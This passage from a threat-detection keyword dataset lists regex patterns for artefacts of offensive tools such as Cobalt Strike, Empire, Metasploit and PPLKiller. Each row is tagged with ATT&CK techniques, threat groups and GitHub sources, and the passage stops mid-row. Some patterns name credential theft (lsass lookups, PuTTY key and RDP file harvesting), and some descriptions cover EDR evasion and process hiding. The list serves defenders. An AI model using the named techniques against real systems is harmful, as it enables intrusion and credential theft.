"*process_snapshot.exe*",".{0,1000}process_snapshot\.exe.{0,1000}","offensive_tool_keyword","acheron","indirect syscalls for AV/EDR evasion in Go assembly","T1055.012 - T1059.001 - T1059.003","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/f1zm0/acheron","1","1","N/A","N/A","N/A","4","326","39","2023-06-13T19:20:33Z","2023-04-07T10:40:33Z","55510"
"*ProcessCommandChannelImplantMessage*",".{0,1000}ProcessCommandChannelImplantMessage.{0,1000}","offensive_tool_keyword","SharpSocks","Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell","T1090 - T1021.001","TA0002","N/A","N/A","C2","https://github.com/nettitude/SharpSocks","1","1","N/A","N/A","10","10","482","84","2023-03-15T19:19:30Z","2017-11-10T13:29:08Z","55511"
"*ProcessDestroy.x64*",".{0,1000}ProcessDestroy\.x64.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","55512"
"*ProcessDestroy.x64.*",".{0,1000}ProcessDestroy\.x64\..{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","55513"
"*ProcessDestroy.x86*",".{0,1000}ProcessDestroy\.x86.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","55514"
"*ProcessDestroy.x86.*",".{0,1000}ProcessDestroy\.x86\..{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","55515"
"*ProcessEncryptedC2Request*",".{0,1000}ProcessEncryptedC2Request.{0,1000}","offensive_tool_keyword","SharpSocks","Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell","T1090 - T1021.001","TA0002","N/A","N/A","C2","https://github.com/nettitude/SharpSocks","1","1","N/A","N/A","10","10","482","84","2023-03-15T19:19:30Z","2017-11-10T13:29:08Z","55516"
"*ProcessFileZillaFile*",".{0,1000}ProcessFileZillaFile.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","55517"
"*ProcessHerpaderping_x64*",".{0,1000}ProcessHerpaderping_x64.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","55523"
"*ProcessHerpaderping_x86*",".{0,1000}ProcessHerpaderping_x86.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","55524"
"*ProcessHerpaderpingTemplate*",".{0,1000}ProcessHerpaderpingTemplate.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","55525"
"*processhider.c*",".{0,1000}processhider\.c.{0,1000}","offensive_tool_keyword","Sudomy","Ghost In The Shell - This tool will setting up your backdoor/rootkits when backdoor already setup it will be hidden your spesisifc process.unlimited your session in metasploit and transparent. Even when it killed. it will re-run again. There always be a procces which while run another process.So we can assume that this procces is unstopable like a Ghost in The Shell","T1587 - T1588 - T1608","N/A","N/A","N/A","Exploitation tool","https://github.com/screetsec/Vegile","1","1","#linux","N/A","N/A","8","726","164","2022-09-01T01:54:35Z","2018-01-02T05:29:48Z","55526"
"*-ProcessID * -Dll * -Module *",".{0,1000}\-ProcessID\s.{0,1000}\s\-Dll\s.{0,1000}\s\-Module\s.{0,1000}","offensive_tool_keyword","empire","empire script arguments Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1047","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","55527"
"*processImplantMessage*",".{0,1000}processImplantMessage.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1071 - T1090 - T1102 - T1027 - T1571","TA0011 - TA0003 - TA0010","N/A","Dispossessor","C2","https://github.com/p3nt4/Nuages","1","1","N/A","N/A","10","10","455","85","2025-04-10T15:34:19Z","2019-05-12T11:00:35Z","55528"
"*process-inject *",".{0,1000}process\-inject\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/malleable-c2","1","0","N/A","N/A","10","10","1676","299","2023-12-13T17:14:22Z","2018-08-14T14:19:43Z","55529"
"*processinject_min_alloc*",".{0,1000}processinject_min_alloc.{0,1000}","offensive_tool_keyword","cobaltstrike","SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Tylous/SourcePoint","1","1","N/A","N/A","10","10","1109","156","2025-04-16T17:15:04Z","2021-08-06T20:55:26Z","55530"
"*ProcessManager.exe --machine *",".{0,1000}ProcessManager\.exe\s\-\-machine\s.{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1071.001 - T1059 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1562.001 - T1070 - T1105 - T1106 - T1027 - T1027.002 - T1057 - T1055 - T1620","TA0011 - TA0002 - TA0005 - TA0008 - TA0004 - TA0007 - TA0003 - TA0006 - TA0010","N/A","Indrik Spider","Exploitation tool","https://github.com/TheWover/donut","1","0","N/A","N/A","N/A","10","3882","667","2024-10-23T12:19:13Z","2019-03-27T23:24:44Z","55531"
"*ProcessManager.exe --name explorer*",".{0,1000}ProcessManager\.exe\s\-\-name\sexplorer.{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1071.001 - T1059 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1562.001 - T1070 - T1105 - T1106 - T1027 - T1027.002 - T1057 - T1055 - T1620","TA0011 - TA0002 - TA0005 - TA0008 - TA0004 - TA0007 - TA0003 - TA0006 - TA0010","N/A","Indrik Spider","Exploitation tool","https://github.com/TheWover/donut","1","0","N/A","N/A","N/A","10","3882","667","2024-10-23T12:19:13Z","2019-03-27T23:24:44Z","55532"
"*processPIDByName*lsass.exe*",".{0,1000}processPIDByName.{0,1000}lsass\.exe.{0,1000}","offensive_tool_keyword","PPLKiller","Tool to bypass LSA Protection (aka Protected Process Light)","T1547.002 - T1558.003","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RedCursorSecurityConsulting/PPLKiller","1","0","N/A","N/A","10","10","933","139","2022-12-04T23:38:31Z","2020-07-06T10:11:49Z","55533"
"*ProcessPPKFile*",".{0,1000}ProcessPPKFile.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","55534"
"*ProcessPuTTYLocal*",".{0,1000}ProcessPuTTYLocal.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","55535"
"*ProcessRDPFile*",".{0,1000}ProcessRDPFile.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","55536"
"*ProcessRDPLocal*",".{0,1000}ProcessRDPLocal.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - 